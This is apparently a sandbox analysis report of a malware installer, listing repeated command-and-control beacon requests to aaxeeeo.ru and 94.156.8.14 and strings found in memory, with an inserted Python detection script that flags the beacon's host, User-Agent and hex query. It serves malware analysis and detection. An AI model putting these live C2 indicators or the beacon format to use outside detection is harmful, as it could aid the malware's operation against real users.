                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic | DNS traffic detected: DNS query: aaxeeeo.ru
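The traffic above is the whole network footprint of the sample: one GET to aaxeeeo.ru (resolving to 94.156.8.14, per the memory strings that follow) repeated dozens of times with the same hex-encoded q= value and the same User-Agent. The following detection pass over proxy-log lines is an added example, not part of the Joe Sandbox report and not code from the sample. It matches the host, IP and User-Agent quoted above, and adds three host-independent checks a practitioner would keep after the domain rotates: a /search/?q= value that is one long hex blob rather than words, a User-Agent that names a Windows NT version that never shipped ("Windows NT 9.0"), and an MSIE User-Agent missing the "compatible;" token that every genuine Internet Explorer UA carries. The log line format, client addresses, timestamps, the table of real NT versions and the threshold of five identical requests are assumptions of the example.

```python
"""Detection pass over proxy-log lines for the Socks5Systemz beacon above.

Added example: not part of the Joe Sandbox report and not code from the
sample. The log line format, client addresses, timestamps and the repeat
threshold are assumptions made for illustration.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Indicators taken verbatim from the report.
C2_HOSTS = {"aaxeeeo.ru", "94.156.8.14"}
BEACON_UA = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
Q = ("67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9"
     "95874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95"
     "129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7"
     "ee9d9b39ca689110")

# Host-independent heuristics, for after the C2 domain rotates.
HEX_BLOB = re.compile(r"^[0-9a-f]{64,}$")      # a "search query" that is raw hex
NT_TOKEN = re.compile(r"Windows NT (\d+\.\d+)")
# Windows NT versions that actually shipped (assumed table); "9.0" is not one.
REAL_NT = {"3.1", "3.5", "3.51", "4.0", "5.0", "5.1", "5.2",
           "6.0", "6.1", "6.2", "6.3", "10.0"}

# Assumed log format: ts client method url "user-agent"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "(?P<ua>[^"]*)"$'
)


def nt_version_is_real(ua: str) -> bool:
    """True if the UA has no Windows NT token or names a version that exists."""
    m = NT_TOKEN.search(ua)
    return m is None or m.group(1) in REAL_NT


def ie_ua_is_well_formed(ua: str) -> bool:
    """Genuine IE UAs always carry 'compatible;' before 'MSIE'."""
    return "MSIE" not in ua or "compatible;" in ua


def parse_line(line: str):
    """Split one log line into fields; None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    u = urlsplit(rec["url"])
    rec["host"] = u.hostname or ""
    rec["path"] = u.path
    rec["q"] = parse_qs(u.query).get("q", [""])[0]
    return rec


def classify(rec: dict) -> list:
    """Reasons a single request is suspicious (empty list = nothing seen)."""
    reasons = []
    if rec["host"] in C2_HOSTS:
        reasons.append("known C2 host")
    if rec["ua"] == BEACON_UA:
        reasons.append("known beacon User-Agent")
    if rec["path"].rstrip("/") == "/search" and HEX_BLOB.match(rec["q"]):
        reasons.append("hex blob in /search/?q=")
    if not nt_version_is_real(rec["ua"]):
        reasons.append("Windows NT version that never shipped")
    if not ie_ua_is_well_formed(rec["ua"]):
        reasons.append("MSIE User-Agent without 'compatible;'")
    return reasons


def scan(log_text: str, min_repeats: int = 5):
    """Return (per-line findings, identical requests repeated >= min_repeats)."""
    findings = []
    repeats = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append((rec["client"], rec["host"], reasons))
        repeats[(rec["client"], rec["url"], rec["ua"])] += 1
    beacons = {k: n for k, n in repeats.items() if n >= min_repeats}
    return findings, beacons


# Constructed sample log: six beacons, one real search, one rotated-domain beacon.
def beacon_line(ts: str) -> str:
    return f'{ts} 10.0.0.5 GET http://aaxeeeo.ru/search/?q={Q} "{BEACON_UA}"'

BENIGN_LINE = ('2024-06-12T10:00:07Z 10.0.0.7 GET https://www.google.com/search?q=inno+setup '
               '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"')
ROTATED_LINE = (f'2024-06-12T10:00:08Z 10.0.0.9 GET http://example.com/search/?q={Q} '
                '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"')
SAMPLE_LOG = "\n".join(
    [beacon_line(f"2024-06-12T10:00:{i:02d}Z") for i in range(6)] + [BENIGN_LINE, ROTATED_LINE]
)

if __name__ == "__main__":
    findings, beacons = scan(SAMPLE_LOG)
    for client, host, reasons in findings:
        print(client, host, "; ".join(reasons))
    for (client, url, _ua), n in beacons.items():
        print(f"beacon: {client} sent the identical request {n} times to {urlsplit(url).hostname}")
```

Run as a script, it flags the six aaxeeeo.ru requests on all five checks, flags the example.com request on the hex-blob check alone (the host and User-Agent have changed, the structure has not), leaves the ordinary Google search untouched, and reports the one client that repeated an identical request six times. Treat the host list as disposable and the structural checks as the durable part of the rule: the report shows the same request replayed 46 times, which is the repeat counter's signal.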
Source: recordpadsoundrecorder32.exe, 00000004.00000002.3269409364.0000000000969000.00000004.00000020.00020000.00000000.sdmp, recordpadsoundrecorder32.exe, 00000004.00000002.3270365274.0000000003351000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.156.8.14/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f8
Source: recordpadsoundrecorder32.exe, 00000004.00000002.3269409364.000000000095F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.156.8.14/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d
Source: is-UCHQL.tmp.1.dr | String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: is-UCHQL.tmp.1.dr | String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
Source: is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: is-UCHQL.tmp.1.dr | String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: is-UCHQL.tmp.1.dr | String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: is-UCHQL.tmp.1.dr | String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: is-VDBC5.tmp.1.dr | String found in binary or memory: http://lame.sf.net
Source: is-VDBC5.tmp.1.dr | String found in binary or memory: http://lame.sf.net32bits64bits
Source: is-VDBC5.tmp.1.dr | String found in binary or memory: http://lame.sf.netB
Source: is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.dr | String found in binary or memory: http://ocsp.sectigo.com0
Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: is-UCHQL.tmp.1.dr | String found in binary or memory: http://ocsps.ssl.com0
Source: is-UCHQL.tmp.1.dr | String found in binary or memory: http://ocsps.ssl.com0?
Source: is-UCHQL.tmp.1.dr | String found in binary or memory: http://ocsps.ssl.com0Q
Source: is-KI2RB.tmp.1.dr | String found in binary or memory: http://qt-project.org/xml/features/report-start-end-entity
Source: is-KI2RB.tmp.1.dr | String found in binary or memory: http://qt-project.org/xml/features/report-whitespace-only-CharData
Source: is-8ECK7.tmp.1.dr | String found in binary or memory: http://qtav.org2
Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.dr | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.dr | String found in binary or memory: http://t2.symcb.com0
Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.dr | String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.dr | String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.dr | String found in binary or memory: http://tl.symcd.com0&
Source: is-KI2RB.tmp.1.dr | String found in binary or memory: http://trolltech.com/xml/features/report-start-end-entity
Source: is-KI2RB.tmp.1.dr | String found in binary or memory: http://trolltech.com/xml/features/report-whitespace-only-CharData
Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: tOniaJ21lj.tmp, tOniaJ21lj.tmp, 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, tOniaJ21lj.tmp.0.dr, is-O2PKH.tmp.1.dr | String found in binary or memory: http://www.innosetup.com/
Source: tOniaJ21lj.exe, 00000000.00000003.2017542262.0000000002091000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.exe, 00000000.00000002.3269480886.0000000002091000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.exe, 00000000.00000003.2017464437.0000000002310000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000003.2022441507.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000002.3269794199.0000000002328000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000003.2019413603.0000000002328000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000003.2019304134.0000000003280000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000002.3269392528.00000000006AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.mpegla.com
Source: tOniaJ21lj.exe, 00000000.00000003.2018211873.0000000002098000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.exe, 00000000.00000003.2017811455.0000000002310000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, tOniaJ21lj.tmp, 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, tOniaJ21lj.tmp.0.dr, is-O2PKH.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/ps
Source: tOniaJ21lj.exe, 00000000.00000003.2018211873.0000000002098000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.exe, 00000000.00000003.2017811455.0000000002310000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, tOniaJ21lj.tmp.0.dr, is-O2PKH.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/psU
Source: is-UCHQL.tmp.1.dr | String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: is-KI2RB.tmp.1.dr | String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: is-KI2RB.tmp.1.dr | String found in binary or memory: http://xml.org/sax/features/namespaces
Source: is-KI2RB.tmp.1.dr | String found in binary or memory: http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltech
Source: is-UTKLG.tmp.1.dr | String found in binary or memory: https://curl.haxx.se/V
Source: is-UTKLG.tmp.1.dr | String found in binary or memory: https://curl.haxx.se/docs/copyright.htmlD
Source: is-UTKLG.tmp.1.dr | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.dr | String found in binary or memory: https://sectigo.com/CPS0
Source: is-UCHQL.tmp.1.dr | String found in binary or memory: https://www.ssl.com/repository0
Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.dr | String found in binary or memory: https://www.thawte.com/cps0/
Source: is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.dr | String found in binary or memory: https://www.thawte.com/repository0W
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0042EEF4 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00423AF4 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00412548 NtdllDefWindowProc_A
